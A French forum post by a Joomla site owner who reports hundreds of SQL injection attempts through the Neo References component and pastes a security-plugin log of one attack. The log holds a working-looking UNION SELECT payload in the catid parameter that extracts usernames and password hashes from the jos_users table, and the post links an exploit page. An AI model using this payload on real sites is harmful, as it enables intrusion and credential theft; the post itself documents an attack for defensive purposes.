Salut,
G télécharger et installer Neo references pour test sur mon site sous joomla 1.13 il y a quelques semaines et tout tournait rond lol.
Depuis le 20 Janvier j'ai constaté des requetes anormales sur mon site et je me suis rendu compte que mon site essuyait plusieurs centaines (!) de tentatives de hack en essayant de passer par Neojoomla.
Voici les infos que j'ai pu recuperer durant l'attaque (merci JDefender en passant):
Additional Information:
---------------------------------------------
TYPE: SQL injection
IP: 86.60.71.85
USER:
REFERER:
GET: Array
(
[option] => com_neoreferences
[Itemid] => 27
[catid] =>
<b>99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* where user_id=1=1/*</b>
)
POST: Array
(
[catid] =>
<b>99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* where user_id=1=1/*</b>
)
COOCKIE: Array
(
[fd5eaa69558795199ae64632c047a50d] => -
[JATheme] => ja_bellatrix
[ColorCSS] => brick
[ScreenType] => wide
[FontSize] => 3
[virtuemart] => 896b34e5000a9b6a3ba75b5f7b5e6074
Un autre de mes sites sous joomla et neoreferences ( à la sécurité plutot relaché je l'avoue) s'est fait hacker en utilisant la meme methode sql injection (pas trop de souci, juste un site de test sous joomla, que g vidé et fermé aprés l'attaque).
Apres quelques recherches via google j'ai fini par trouvé cela :
http://www.milw0rm.com/exploits/5034Cela aidera peut etre a y voir clair dans cette attaque...
Author